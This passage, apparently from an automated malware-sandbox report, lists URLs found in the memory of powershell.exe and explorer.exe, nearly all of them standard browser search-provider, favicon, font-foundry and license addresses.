Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000017.00000002.521630583.0000028A00001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
